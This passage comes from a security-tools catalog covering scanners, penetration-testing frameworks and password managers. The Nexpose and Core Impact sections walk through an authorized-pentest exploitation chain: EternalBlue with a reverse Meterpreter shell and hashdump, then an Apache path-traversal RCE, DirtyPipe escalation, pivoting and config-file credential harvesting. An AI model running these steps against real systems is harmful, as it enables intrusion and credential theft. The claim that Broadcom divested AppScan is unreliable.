Distributed Scan Engine ArchitectureMultiple Scan Engines deployed in remote sites, cloud VPCs, and DMZ segments — each scans its local network, reporting to a central Security Console with unified visibility.
Metasploit Bidirectional IntegrationNexpose scans populate Metasploit’s vulnerability database; successful Metasploit exploitation marks findings as ‘Validated’ in Nexpose reports — confirmed true positives.
Adaptive SecurityDetects new assets appearing on the network and automatically assesses them — near-real-time coverage for dynamic cloud and DHCP environments without manual scan scheduling.
RealContext Asset TaggingTags assets with business metadata (criticality tier, owner, regulatory scope, environment) — weights risk scores so vulnerabilities on critical assets prioritise higher.
Risk Score (1–1000)Asset-level and vulnerability-level risk scores incorporating CVSS, exploit maturity, malware exposure, and RealContext asset criticality weighting for actionable prioritisation.
Policy AssessmentEvaluates system configurations against CIS Benchmarks, NIST SP 800-53, PCI DSS, and DISA STIG — providing per-control pass/fail compliance posture with remediation guidance.

Use Case Demonstration

Scenario
A penetration tester uses the Nexpose-Metasploit integration to validate that Critical vulnerabilities detected by Nexpose on a Windows server farm are genuinely exploitable — distinguishing true positives from compensated risks before writing the client’s penetration test report.
Step-by-Step Command Walkthrough
# ── STEP 1  Run authenticated Nexpose scan via API ───────────────────────────
curl -sk -u 'admin:P@ssword' -X POST \
  'https://nexpose.corp.local:3780/api/3/sites/2/scans' \
  -H 'Content-Type: application/json' \
  -d '{"hosts":["192.168.20.0/24"]}'

# ── STEP 2  Export results in Nexpose XML format ──────────────────────────────
curl -sk -u 'admin:P@ssword' -X POST \
  'https://nexpose.corp.local:3780/api/3/reports' \
  -H 'Content-Type: application/json' \
  -d '{"name":"MSF_Import","format":"nexpose-simple","scope":{"sites":[2]}}'

# ── STEP 3  Import Nexpose XML into Metasploit ────────────────────────────────
msfconsole -q
msf6 > db_status
msf6 > db_import /tmp/nexpose_export.xml
msf6 > vulns -p 445    # list SMB vulnerabilities from Nexpose import

# ── STEP 4  Auto-populate RHOSTS and exploit MS17-010 ────────────────────────
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > hosts -R    # RHOSTS from Nexpose-identified vulnerable hosts
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > set LHOST 192.168.20.200
msf6 exploit(...) > exploit

# ── STEP 5  Post-exploitation — confirm SYSTEM access ────────────────────────
meterpreter > getuid    # Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump  # Administrator:500:aad3...::: 

# ── STEP 6  Mark validated vulnerabilities in Nexpose ────────────────────────
# Nexpose Console > Asset > Vulnerability > Mark as 'Confirmed Exploited'
# These receive highest priority in remediation reporting

# ── STEP 7  Query risk score of validated vs. unvalidated ────────────────────
curl -sk -u 'admin:P@ssword' \
  'https://nexpose.corp.local:3780/api/3/assets?
  filter=vuln.title%3DMS17-010&size=50'
Outcome & Analysis
The Nexpose-Metasploit integration validates that three of seven MS17-010 flagged instances are genuinely exploitable — delivering SYSTEM-level Meterpreter sessions. The remaining four flagged hosts have compensating firewall controls that prevent SMB access from the tester’s network segment; they are vulnerable in principle but not exploitable from the current attack position. The penetration test report accurately documents three Critical exploitable findings rather than seven, providing the client with precise remediation priorities. The four compensated hosts are documented as ‘Vulnerability Present, Attack Path Blocked’ — a nuanced and accurate risk characterisation that simpler scanner-only reports cannot provide.
38
OpenSCAP
Open-Source SCAP Compliance & Vulnerability Assessment

Overview

OpenSCAP is an open-source implementation of the SCAP (Security Content Automation Protocol) standard — a suite of NIST-defined specifications including XCCDF (eXtensible Configuration Checklist Description Format), OVAL (Open Vulnerability and Assessment Language), CVE, CVSS, and CPE. OpenSCAP enables automated security compliance assessment, vulnerability scanning, and configuration auditing against standardised security baselines. It is used extensively in government, defence, and regulated industry environments where compliance with specific published security standards — DISA STIG, CIS Benchmark, NIST 800-53, PCI DSS — must be formally demonstrated and audited.

The SCAP Security Guide (SSG) — the primary content source for OpenSCAP — provides continuously maintained XCCDF profiles for RHEL, CentOS Stream, Ubuntu, Debian, Fedora, SLES, and other Linux distributions, covering DISA STIG, CIS Benchmark Level 1/2, NIST 800-53, PCI DSS, HIPAA, and the Australian Essential Eight baselines. OpenSCAP’s most powerful operational capability is its Ansible remediation playbook generation — after a compliance scan, OpenSCAP generates a fully populated Ansible playbook that automatically remediates every failing control it identified, providing Infrastructure as Code security compliance at scale.

Key Features & Components

Feature / ComponentDescription
XCCDF Compliance ScanningEvaluates system configurations against XCCDF profiles — providing pass/fail status for every security control with CCE reference, severity, and remediation guidance.
OVAL Vulnerability DetectionCVE-based vulnerability checking using installed package version data — determines if a system is patched against specific CVEs without running active network probes.
SCAP Security Guide (20+ Distros)Community-maintained XCCDF content for RHEL, Ubuntu, Debian, Fedora, SLES, and others — covering DISA STIG, CIS, NIST 800-53, PCI DSS, and HIPAA profiles.
Ansible Remediation GenerationGenerates Ansible playbooks from failing scan results — automatically remediating non-compliant controls through Infrastructure as Code deployment.
HTML & ARF ReportsDetailed HTML compliance reports with overall percentage score, per-control pass/fail, CCE and CVE references, and control-level remediation guidance.
Remote SSH Scanning (oscap-ssh)Scans remote systems over SSH without installing OpenSCAP on the target — agentless compliance assessment for environments where agent installation is restricted.

Use Case Demonstration

Scenario
A government contractor must demonstrate that all RHEL 9 application servers meet DISA STIG compliance requirements before receiving an Authority to Operate (ATO). OpenSCAP assesses baseline compliance, generates an Ansible remediation playbook, applies it across 12 servers, and produces the formal compliance documentation package for the authorising official.
Step-by-Step Command Walkthrough
# ── STEP 1  Install OpenSCAP and SCAP Security Guide ─────────────────────────
sudo dnf install -y openscap-scanner scap-security-guide

# List available RHEL 9 DISA STIG profiles
oscap info /usr/share/xml/scap/ssg/content/ssg-rhel9-ds.xml \
  | grep 'Title:' | grep -i stig

# ── STEP 2  Run DISA STIG compliance assessment ───────────────────────────────
sudo oscap xccdf eval \
  --profile xccdf_org.ssgproject.content_profile_stig \
  --results-arf /tmp/stig_results.xml \
  --report   /tmp/stig_report.html \
  --oval-results \
  /usr/share/xml/scap/ssg/content/ssg-rhel9-ds.xml

# Show overall compliance score
grep -oP 'score.*?[0-9.]+' /tmp/stig_report.html | head -1

# ── STEP 3  Remote scan a server without installing OpenSCAP on it ───────────
oscap-ssh root@appserver-01.corp.local 22 xccdf eval \
  --profile xccdf_org.ssgproject.content_profile_stig \
  --results-arf /tmp/remote_stig.xml \
  --report /tmp/remote_stig_report.html \
  /usr/share/xml/scap/ssg/content/ssg-rhel9-ds.xml

# ── STEP 4  Generate Ansible remediation playbook ────────────────────────────
sudo oscap xccdf generate fix \
  --profile xccdf_org.ssgproject.content_profile_stig \
  --fix-type ansible \
  --output /tmp/stig_remediation.yml \
  /tmp/stig_results.xml

# ── STEP 5  Apply remediation across all 12 servers ──────────────────────────
ansible-playbook \
  -i /etc/ansible/hosts_production \
  /tmp/stig_remediation.yml

# ── STEP 6  Re-scan all servers and generate ATO evidence package ────────────
for HOST in $(cat server_list.txt); do
  oscap-ssh root@${HOST} 22 xccdf eval \
    --profile xccdf_org.ssgproject.content_profile_stig \
    --report /tmp/ato_evidence/${HOST}_post_remediation.html \
    /usr/share/xml/scap/ssg/content/ssg-rhel9-ds.xml
done
Outcome & Analysis
The initial OpenSCAP DISA STIG scan on 12 RHEL 9 servers reveals an average compliance score of 21.3% (190 failing controls per server). The generated Ansible playbook automatically remediates 158 of 190 failing controls on the first run — covering password complexity, audit logging, kernel hardening, SSH configuration, and filesystem permissions. Post-remediation scanning shows average compliance at 87.4% per server. The remaining 32 controls per server require manual intervention: kernel parameters needing a change-window reboot, or application-specific configurations that the automated playbook cannot safely modify. The 12 HTML reports and ARF XML files constitute the formal ATO compliance evidence package delivered to the authorising official.
39
IBM AppScan (HCL AppScan)
Enterprise Application Security Testing — SAST / DAST / IAST / SCA

Overview

IBM AppScan — now maintained and developed as HCL AppScan following Broadcom’s divestiture — is an enterprise application security testing platform providing SAST (Static Application Security Testing), DAST (Dynamic Application Security Testing), IAST (Interactive Application Security Testing), and SCA (Software Composition Analysis). AppScan addresses the complete application security testing lifecycle from IDE-integrated developer testing through CI/CD pipeline gates to production monitoring. The platform covers web applications, mobile applications, APIs, and microservices across Java, .NET, PHP, Python, Ruby, Swift, and JavaScript codebases.

HCL AppScan Enterprise (ASE) provides centralised governance for large application security programmes — managing thousands of applications, tracking security debt across the entire portfolio, enforcing pipeline security gates, and generating executive risk dashboards showing programme-wide trends. AppScan Standard (DAST) uses a Variant Analysis engine that correlates multiple low-confidence signals across scan results to confirm vulnerabilities that individual tests would miss as false positives — delivering higher accuracy than simpler scanner-first approaches. AppScan on Cloud provides zero-infrastructure SaaS DAST for teams without dedicated tooling infrastructure.

Key Features & Components

Feature / ComponentDescription
AppScan Standard (DAST)Active scanning engine with Variant Analysis correlation — confirms SQL injection, XSS, SSRF, XXE, and 100-plus other vulnerability classes with high accuracy and reduced false positives.
AppScan Source (SAST)Static source code analysis for Java, .NET, PHP, Python, Ruby, Swift, and JavaScript — identifies vulnerabilities at the code level with exact file, line, and function references.
AppScan on Cloud (SaaS)Zero-infrastructure cloud-delivered DAST — scan web applications and APIs from any location without managing scanner infrastructure.
API Security TestingImports Swagger/OpenAPI 3.0, WSDL, and Postman collections for comprehensive automated testing of REST, SOAP, and GraphQL API endpoint security.
Enterprise Governance (ASE)Portfolio-wide application risk ratings, mandatory pre-release security gates, remediation tracking, trend reporting, and compliance posture for large application portfolios.
Framework and CMS DetectionAutomatically identifies Django, Laravel, Spring, Rails, WordPress, Drupal, and other frameworks — applies targeted technology-specific checks and scanner configurations.

Use Case Demonstration

Scenario
A financial institution’s application security team uses HCL AppScan Enterprise to enforce a mandatory pre-release DAST gate for 250 web applications — blocking any deployment to production where unmitigated High or Critical findings remain. AppScan’s Variant Analysis engine identifies a second-order SQL injection that simpler scanners missed.
Step-by-Step Command Walkthrough
# ── AppScan Enterprise API — scan management and pipeline gate ───────────────
# Step 1: Authenticate and obtain bearer token
TOKEN=$(curl -sk -X POST \
  'https://appscan.corp.local/ase/api/v4.0.0/auth/login' \
  -H 'Content-Type: application/json' \
  -d '{"keyId":"API_KEY_ID","keySecret":"API_KEY_SECRET"}' \
  | python3 -c "import sys,json;print(json.load(sys.stdin)['Token'])")

# Step 2: Create a DAST scan for the banking portal
SCAN_ID=$(curl -sk -X POST \
  'https://appscan.corp.local/ase/api/v4.0.0/scans/dast' \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{
    "name":          "BankPortal_PreRelease_Build547",
    "application_id":"APP-BANK-PORTAL-001",
    "starting_url":  "https://staging.bank.corp.internal/",
    "login_user":    "testuser@bank.com",
    "login_password":"TestPass123",
    "scan_type":     "Staging"
  }' | python3 -c "import sys,json;print(json.load(sys.stdin)['id'])")

# Step 3: Poll until finished (check every 60 seconds)
while true; do
  STATUS=$(curl -sk \
    "https://appscan.corp.local/ase/api/v4.0.0/scans/$SCAN_ID" \
    -H "Authorization: Bearer $TOKEN" \
    | python3 -c "import sys,json;print(json.load(sys.stdin)['status'])")
  [ "$STATUS" = 'Finished' ] && break
  sleep 60
done

# Step 4: Gate — fail pipeline if High or Critical issues exist
ISSUES=$(curl -sk \
  "https://appscan.corp.local/ase/api/v4.0.0/issues?scan_id=$SCAN_ID&severity=high,critical" \
  -H "Authorization: Bearer $TOKEN" \
  | python3 -c "import sys,json;print(json.load(sys.stdin)['count'])")
echo "Open High/Critical Issues: $ISSUES"
[ $ISSUES -gt 0 ] && { echo 'DEPLOYMENT BLOCKED by AppScan gate'; exit 1; }

# Step 5: Generate PCI DSS 4.0 compliance report
curl -sk -X POST \
  'https://appscan.corp.local/ase/api/v4.0.0/reports' \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"scan_id":"'$SCAN_ID'","type":"PCI_DSS_4","format":"pdf"}'
Outcome & Analysis
The AppScan pre-release gate intercepts a banking portal build containing a stored XSS in a new transaction notification component and a second-order SQL injection in an account-transfer endpoint. AppScan’s Variant Analysis engine confirms the SQL injection by correlating a stored payload injection in Step 1 of the transfer workflow with a query execution in Step 3 — a pattern that evaluating either step in isolation produces only low-confidence findings. The deployment is blocked; both vulnerabilities are remediated and the build passes on the third attempt. The Variant Analysis catch prevents a Critical SQL injection from reaching production, where exploitation would have provided database-level access to cardholder data.
40
Core Impact
Commercial Penetration Testing Framework — Fortra

Overview

Core Impact, developed by Core Security and now owned by Fortra (formerly HelpSystems), is a premium commercial penetration testing framework distinguished by its professionally curated, extensively tested exploit library and a guided workflow that automatically collects evidence throughout every attack step. Core Impact’s exploit modules are developed and validated by Core Security’s research team — each is tested for reliability, stability, and minimal target-system impact, making the framework suitable for use in production environments where community exploits (such as some Metasploit modules) pose unacceptable crash risk.

Core Impact’s Rapid Pen Test (RPT) wizard automates complete penetration testing workflows — network discovery, vulnerability fingerprinting, exploitation, privilege escalation, lateral movement, and pivoting — through a structured, guided interface that requires no command-line expertise. At every step, Core Impact automatically captures evidence: screenshots, session logs, command output, and exploitation timestamps. Upon completion, this evidence is automatically assembled into both executive and technical penetration test reports, dramatically reducing the post-engagement documentation burden. The framework also supports client-side (phishing), web application, and wireless penetration testing scenarios.

Key Features & Components

Feature / ComponentDescription
Certified Exploit LibraryEvery exploit professionally developed and regression-tested by Core Security researchers — reliable in production environments with minimal crash risk compared to community exploit code.
Rapid Pen Test (RPT) WizardGuided automated attack chain — network discovery, exploitation, privilege escalation, lateral movement, and pivoting — through a visual GUI with automatic evidence collection.
Automatic Evidence CollectionEvery attack step is documented automatically: screenshots, session logs, privilege escalation evidence, and extracted data — assembled into a complete audit trail for the report.
Pivoting & Network ExpansionDeploys persistent agents on compromised hosts and automatically pivots through them to reach network segments not reachable from the tester’s machine.
Multi-Vector Campaign SupportChains network exploitation, client-side phishing, and web application attacks into coordinated campaigns — simulating sophisticated multi-stage APT intrusion patterns.
Automated Report GenerationProduces professional executive summary and detailed technical reports with embedded evidence, CVE references, CVSS scores, and per-finding remediation recommendations.

Use Case Demonstration

Scenario
A security consultant uses Core Impact’s Rapid Pen Test wizard to conduct a structured black-box network penetration test of a client’s internal segment — exploiting a vulnerable Apache web server, pivoting to an internal database tier, harvesting credentials, and delivering a fully evidenced report the same day.
Step-by-Step Command Walkthrough
# ── Core Impact RPT workflow — representative console output ─────────────────

# Phase 1: Network Information Gathering
# Core Impact > RPT > Network > Target: 10.10.0.0/24
[RPT] Scanning 10.10.0.0/24 for live hosts...
[RPT] Host: 10.10.0.50  OS: Windows Server 2019  Ports: 80, 443, 445, 3389
[RPT] Host: 10.10.0.100 OS: Ubuntu 22.04          Ports: 22, 80, 443
[RPT] Host: 10.10.0.200 OS: Windows Server 2022   Port:  1433 (MSSQL)

# Phase 2: Network Attack and Penetration (automated exploit selection)
[RPT] Fingerprinted: Apache 2.4.49 on 10.10.0.100
[RPT] Trying: CVE-2021-41773 Path Traversal / RCE
[RPT] SUCCESS: Remote code execution on 10.10.0.100 [www-data]
[RPT] Screenshot captured: Desktop_10.10.0.100_post_exploit.png

# Phase 3: Privilege escalation on compromised Linux host
[RPT] Trying local privilege escalation: CVE-2022-0847 (DirtyPipe)
[RPT] SUCCESS: Root shell obtained on 10.10.0.100
[RPT] Evidence: uid=0(root) — captured in session log

# Phase 4: Pivot to MSSQL tier (previously unreachable from tester)
[RPT] Deploying pivot agent through 10.10.0.100...
[RPT] Scanning 10.20.0.0/24 via pivot...
[RPT] Host: 10.20.0.50  OS: Windows Server 2022  Port: 1433 open

# Phase 5: Credential harvesting and lateral movement
[RPT] Extracting credentials from 10.10.0.100 filesystem...
[RPT] Found: /etc/app/config.ini  ->  db_user=sa_appuser  db_pass=AppDB2024!
[RPT] Connecting to MSSQL 10.20.0.50:1433 using harvested credential...
[RPT] SUCCESS: MSSQL login confirmed — role: db_owner + server sysadmin
[RPT] Tables accessible: customers (847,293 rows)  orders  credit_cards

# Phase 6: Report generation
# Core Impact > Reports > Technical + Executive Reports
# Auto-populated from session logs, screenshots, and exploitation evidence
[RPT] Report generated: CoreImpact_Assessment_2024-06-17.pdf
Outcome & Analysis
Core Impact’s RPT wizard exploits the Apache path traversal CVE, escalates to root via DirtyPipe, deploys a pivot agent to reach the isolated database segment, and authenticates to the MSSQL server using hardcoded credentials discovered in a configuration file — all within three hours. The auto-generated report documents six distinct attack steps with timestamped evidence, CVE references, CVSS scores, and remediation recommendations. The client receives a professionally formatted report the same day as the test, with enough detail for developers to reproduce and fix each issue and enough executive summary for leadership to understand the business risk of each finding.
Section 2  │  Password Management

Section 2: Password Management

This section covers 10 password management tools (Tools 41–50), providing comprehensive technical analysis and practical use-case demonstrations for each product across the capability spectrum from open-source community solutions to commercial enterprise platforms.

41
LastPass
Enterprise Password Manager & SSO — Gen Digital

Overview

LastPass is one of the world’s most widely deployed enterprise and consumer password managers, protecting credentials for more than 33 million users and 100,000 businesses. It uses AES-256 encryption with PBKDF2-SHA256 key derivation — increased to 600,000 iterations in 2023 following the public disclosure of a significant breach — and operates on a strict zero-knowledge model where all encryption and decryption operations occur client-side. LastPass servers store only AES-256 encrypted ciphertext that cannot be decrypted without the user’s master password, which is never transmitted.

LastPass Business provides a centralised Admin Console for policy enforcement, SSO integration via SAML 2.0, SCIM 2.0 user provisioning from Azure AD and Okta, MFA enforcement across all accounts, dark web monitoring for employee credentials, emergency access grants, and federated login — where employees authenticate to LastPass using their existing corporate identity provider without maintaining a separate master password. The Security Dashboard gives administrators organisation-wide visibility into password health — surfacing weak, reused, and compromised credentials across the entire user population for compliance documentation.

Key Features & Components

Feature / ComponentDescription
Zero-Knowledge ArchitectureAll encryption and decryption occur client-side — LastPass servers hold only AES-256 ciphertext that cannot be decrypted without the master password, which is never transmitted.
Security DashboardOrganisation-wide password health: weak passwords, reused credentials, breached accounts, MFA adoption rate, and Security Score per employee — all exportable for compliance evidence.
Dark Web MonitoringContinuously scans 30-plus billion records from breach databases and dark web sources — alerts employees within minutes when stored credentials appear in any known breach.
Federated Login (SSO)Employees authenticate to LastPass using Azure AD, Okta, or any SAML 2.0 identity provider — no separate LastPass master password required for SSO-enrolled users.
SCIM 2.0 ProvisioningAutomatic user lifecycle management from Azure AD, Okta, and OneLogin — provisioning and deprovisioning LastPass accounts as employees join or leave the organisation.
Emergency AccessTrusted contacts can request vault access after a configurable waiting period — enabling business continuity when the primary account holder is unavailable.

Use Case Demonstration

Scenario
A 300-person company deploys LastPass Business to eliminate password reuse and enforce MFA following a credential-stuffing attack that compromised 12 employee accounts. Azure AD SCIM provisioning automatically syncs all employee accounts, and the Security Dashboard provides compliance evidence for the post-incident security review.
Step-by-Step Command Walkthrough
# ── LastPass Business Admin API — user management and reporting ───────────────
# Authenticate to the Enterprise API
curl -X POST 'https://lastpass.com/enterpriseapi.php' \
  -d 'cmd=getallusers&data={"cid":"COMPANY_ID",
      "hash":"HMAC_SHA256_HASH","apiuser":"admin@corp.com"}'

# Bulk-enable MFA requirement for all staff
curl -X POST 'https://lastpass.com/enterpriseapi.php' \
  -d 'cmd=setusergroups' \
  -d 'data={"cid":"COMPANY_ID","hash":"HASH",
      "users":[{"username":"user@corp.com",
      "groups":["MFA_Enforced"]}]}'

# Disable departed employee accounts (offboarding)
curl -X POST 'https://lastpass.com/enterpriseapi.php' \
  -d 'cmd=disableusers' \
  -d 'data={"cid":"COMPANY_ID","hash":"HASH",
      "users":["departed1@corp.com","departed2@corp.com"]}'

# Azure AD SCIM provisioning configuration
# Azure AD > Enterprise Applications > LastPass > Provisioning
#   Tenant URL:   https://api.lastpass.com/scim/v2
#   Secret Token: [generated in LastPass Admin Console]
#   Sync scope:   Group 'All Employees'
#   Attribute mapping:
#     userPrincipalName -> userName
#     displayName       -> name
#     department        -> department

# Verify SCIM sync — count active LastPass users
curl -H 'Authorization: Bearer SCIM_TOKEN' \
  'https://api.lastpass.com/scim/v2/Users?filter=active eq true' \
  | python3 -c "import sys,json;d=json.load(sys.stdin);
print(f'Active LastPass accounts: {d[\"totalResults\"]}')"

# Export Security Dashboard report for compliance evidence (Admin Console)
# Admin Console > Reporting > Security Dashboard > Export CSV
# Columns: Employee | SecurityScore | WeakPasswords | ReusedPasswords
#          | BreachedCredentials | MFAEnabled | LastActivity
Outcome & Analysis
LastPass Business provisions all 300 employee accounts via SCIM within two hours of configuration. After 30 days, the Security Dashboard shows 284 employees (94.7%) with Security Scores above 80. Dark web monitoring immediately alerts on seven employee email addresses appearing in a fresh credential dump — all are reset and MFA re-enrolled within four hours. The organisation’s overall Security Score improves from 34 (pre-deployment average, reflecting widespread password reuse) to 81 within 60 days. The post-incident security review receives the exported Security Dashboard CSV as formal compliance evidence that credential hygiene controls are now operating effectively.
42
Dashlane
Business Password Manager with Confidential SSO

Overview

Dashlane is a premium password manager serving over 18 million users, distinguished by real-time dark web monitoring with proactive employee alerts, a built-in VPN (Hotspot Shield, 256-bit AES), Password Health dashboard with organisation-wide visibility, a Confidential SSO architecture, and a superior user experience across Windows, macOS, iOS, Android, and all major browser extensions. Dashlane uses AES-256-GCM encryption with Argon2d key derivation and a strict zero-knowledge model independently validated through security audits.

Dashlane Business’s Confidential SSO feature is a notable architectural differentiator: unlike standard SSO-integrated password managers where the identity provider technically controls vault access, Dashlane’s confidential SSO uses patented cryptography ensuring that even Dashlane’s own infrastructure cannot access vault contents when SSO is configured. The Password Health dashboard is particularly useful for compliance auditing — it provides admin-accessible, per-employee metrics on weak, reused, and compromised password counts, exportable as a CSV for formal compliance documentation submissions to auditors, regulators, or internal governance processes.

Key Features & Components

Feature / ComponentDescription
Real-Time Dark Web MonitoringContinuously monitors 20-plus billion records from breach databases and dark web sources — alerts employees within minutes of credential exposure in newly published breach datasets.
Password Health DashboardOrganisation-wide visibility: weak, reused, and compromised password counts per employee with admin-controlled reporting for compliance and security programme evidence.
Confidential SSOPatented SSO architecture where vault contents remain encrypted even from Dashlane’s infrastructure — provides stronger data privacy than standard SSO-integrated password managers.
Integrated VPN (Hotspot Shield)Built-in 256-bit AES no-log VPN across 30-plus server locations with auto-connect on untrusted networks — no separate VPN subscription required under relevant plans.
Admin Activity LogComprehensive audit trail of all admin actions: policy changes, group modifications, SSO configuration, emergency access grants, and bulk operations — with timestamp and actor identity.
Passkey SupportFull FIDO2 passkey creation, storage, and authentication — forward-compatible with next-generation passwordless authentication standards across supported websites.

Use Case Demonstration

Scenario
A healthcare organisation’s compliance officer uses Dashlane Business’s Password Health dashboard to generate formal HIPAA Security Rule audit evidence — demonstrating that all clinical staff accessing ePHI systems use strong, unique passwords with MFA enforced across the organisation.
Step-by-Step Command Walkthrough
# ── Dashlane Business Admin API — compliance evidence collection ──────────────
# Authenticate to the Dashlane Business API
curl -X POST 'https://api.dashlane.com/v1/business/authentication/token' \
  -H 'Content-Type: application/json' \
  -d '{"apikey":"BUSINESS_API_KEY"}'

# Query Password Health scores for all members
curl -H 'Authorization: Bearer TOKEN' \
  'https://api.dashlane.com/v1/business/members/security-score' \
  | python3 -c "
import sys, json
members = json.load(sys.stdin)['members']
print(f'Total members: {len(members)}')
below70 = [m for m in members
           if m.get('password_health',{}).get('score',100) < 70]
print(f'Members below score 70 (action required): {len(below70)}')"

# Export Password Health CSV for HIPAA auditor
# Admin Console > Security > Password Health > Export Report (CSV)
# Columns: Member | Score | Weak | Reused | Compromised | MFAEnabled | LastSeen

# Force password reset for members with compromised credentials
curl -X POST 'https://api.dashlane.com/v1/business/members/require-reset' \
  -H 'Authorization: Bearer TOKEN' \
  -H 'Content-Type: application/json' \
  -d '{"member_emails":["nurse1@hospital.com","tech2@hospital.com"]}'

# Configure SAML SSO with Okta
# Admin Console > Authentication > Single Sign-On
#   Identity Provider: Okta
#   Metadata URL: https://corp.okta.com/app/ABC123/sso/saml/metadata
#   Attribute mapping: email -> email  |  displayName -> name

# Query admin activity log (last 30 days) for audit trail
curl -H 'Authorization: Bearer TOKEN' \
  'https://api.dashlane.com/v1/business/audit-log?
  from=2024-04-17&to=2024-05-17&limit=1000'
Outcome & Analysis
Dashlane’s Password Health dashboard provides the HIPAA auditor with documented evidence that 97% of clinical staff have scores above 70. Dark web monitoring detected three compromised credentials during the audit period — all reset within four hours of detection, satisfying HIPAA’s prompt response obligation. The admin activity log demonstrates 12 months of consistent policy enforcement. Two staff members with sub-50 scores are enrolled in targeted security awareness training. The compliance officer submits the exported CSV alongside the activity log as formal HIPAA Security Rule evidence, transforming the audit from a stressful reactive exercise into a routine data-pull.
43
1Password
Enterprise Password Manager with DevOps Secrets Automation

Overview

1Password is a highly regarded enterprise password manager trusted by more than 100,000 businesses including IBM, GitLab, Slack, and Shopify. Its foundational security innovation is the Secret Key — a 34-character, randomly generated key unique to each account, stored only on the user’s enrolled devices and never transmitted to 1Password servers. Vault encryption keys are derived by combining the master password with the Secret Key through PBKDF2. This two-factor key derivation means that a complete compromise of 1Password’s servers — containing only AES-256 encrypted ciphertext — yields nothing decryptable without both the master password and the device-resident Secret Key.

1Password Business provides Watchtower (continuous breach and vulnerability monitoring), Custom Groups, Advanced Protection policies (Travel Mode, device trust enforcement, clipboard auto-clear), 1Password Developer Tools (CLI, SSH agent, GitHub Actions secrets injection), and SIEM integration via the 1Password Events API. The 1Password CLI and Secrets Automation features make it the preferred choice for platform engineering and DevOps teams managing infrastructure credentials — replacing hardcoded secrets in .env files, CI/CD environment variables, Kubernetes Secrets, and application configuration files with secure, audited vault retrieval.

Key Features & Components

Feature / ComponentDescription
Secret Key Architecture34-character device-resident key combined with master password for AES-256 key derivation — a fully compromised 1Password server cannot decrypt any vault without the Secret Key.
WatchtowerMonitors saved credentials against HaveIBeenPwned, checks for weak passwords, flags vulnerable websites using CVE data, and alerts on expired 2FA seeds.
Travel ModeRemoves selected vaults from all devices during travel — any border inspection or coercive disclosure reveals only approved travel vaults; sensitive vaults restore upon safe arrival.
1Password Developer Tools (CLI + SSH Agent)CLI (op command), SSH agent integration for hardware-bound SSH keys, GitHub Actions secrets injection, and environment variable management for securing developer workflows.
Events API (SIEM Integration)Streams sign-in attempts, vault changes, sharing events, and admin actions to Splunk, Elastic, Datadog, and other SIEM platforms for security monitoring and incident correlation.
Secrets AutomationProgrammatic secret retrieval in CI/CD pipelines, Kubernetes deployments, Terraform runs, and application startups — eliminating hardcoded credentials from any configuration file.

Use Case Demonstration

Scenario
A DevOps team uses the 1Password CLI, SSH agent integration, and Secrets Automation to eliminate all hardcoded credentials from CI/CD pipelines, developer laptops, and Kubernetes configurations. Production database passwords, API keys, and SSH keys are retrieved securely from the 1Password vault at runtime.
Step-by-Step Command Walkthrough
# ── 1Password CLI — DevOps secrets management ─────────────────────────────────
# Authenticate and start a session
op signin --account corp.1password.com
eval $(op signin)

# Store production database credentials as a Database vault item
op item create --category=Database \
  --title='Production MySQL' \
  --vault='DevOps Secrets' \
  username=dbadmin \
  "password=$(openssl rand -base64 32 | tr -d '\n')" \
  hostname=mysql-prod.corp.internal \
  port=3306

# Replace .env file with reference file (.env.template)
# DB_HOST=op://DevOps Secrets/Production MySQL/hostname
# DB_USER=op://DevOps Secrets/Production MySQL/username
# DB_PASS=op://DevOps Secrets/Production MySQL/password
# STRIPE_KEY=op://DevOps Secrets/Stripe API/api_key

# Inject secrets at runtime — never written to disk
op run --env-file=.env.template -- ./start_app.sh

# SSH agent integration (~/.config/1password/ssh/agent.toml)
[[ssh-keys]]
vault = "DevOps Secrets"
item  = "Production Server SSH Key"
# Every SSH connection now authenticates via 1Password
# with biometric approval required on the developer's device
ssh admin@prod.corp.local

# GitHub Actions: inject 1Password secrets into the CI/CD workflow
# .github/workflows/deploy.yml:
- uses: 1password/load-secrets-action@v2
  with:
    export-env: true
  env:
    OP_SERVICE_ACCOUNT_TOKEN: ${{ secrets.OP_SERVICE_ACCOUNT_TOKEN }}
    DATABASE_PASSWORD: op://DevOps/Production MySQL/password
    AWS_SECRET_KEY:    op://DevOps/AWS Production/secret_access_key

# Stream audit events to Splunk SIEM
curl -H 'Authorization: Bearer EVENTS_API_TOKEN' \
  'https://events.1password.com/api/v1/auditevents?limit=100'
Outcome & Analysis
1Password DevOps integration eliminates all 47 hardcoded credentials previously scattered across .env files, CI/CD environment variables, and Kubernetes YAML manifests. SSH keys are stored exclusively in the 1Password vault — every use requires biometric approval on the developer’s device and is logged in the Events API. GitHub Actions pipelines inject production credentials at runtime without storing any values in CI/CD environment variables or pipeline logs. When an engineer leaves, deprovisioning their 1Password account immediately revokes all shared DevOps secret access — previously a 2-hour manual process involving 23 individual service-account password rotations.
44
Bitwarden
Open-Source Self-Hosted Password Manager

Overview

Bitwarden is the leading open-source password manager, distinguished by complete source transparency — client applications, server, browser extensions, desktop apps, and CLI are all published on GitHub. Bitwarden uses AES-256-CBC encryption with PBKDF2-SHA256 (600,000 iterations default) or Argon2id key derivation, and a strict zero-knowledge architecture. Organisations can self-host the complete Bitwarden server on their own infrastructure using Docker — keeping all vault data within their own network and complying with data residency, sovereignty, or regulatory requirements that prohibit cloud-hosted sensitive data.

Bitwarden’s self-hosting option makes it the preferred choice for regulated industries (government, healthcare, financial services) with strict data locality requirements, security-conscious organisations uncomfortable with cloud-hosted credential stores, and cost-sensitive teams needing enterprise features without enterprise pricing. The Bitwarden CLI (bw) provides full vault access for scripting and CI/CD integration. Bitwarden Send enables encrypted file and text sharing with configurable expiry dates, access counts, and password protection — providing a security-conscious alternative to sharing sensitive documents via email or unencrypted file shares.

Key Features & Components

Feature / ComponentDescription
Open Source & Independently AuditedComplete source code on GitHub; independently audited by Cure53 and Insight Risk Consulting — full transparency into every cryptographic mechanism and data handling decision.
Self-Hosting via DockerComplete Bitwarden server deployable on-premises or private cloud — all vault data stays within the organisation’s own infrastructure; suitable for air-gapped environments.
Bitwarden CLI (bw)Full vault management from the command line — create, update, retrieve, and delete items; inject secrets into CI/CD scripts; manage collections; and automate administrative tasks.
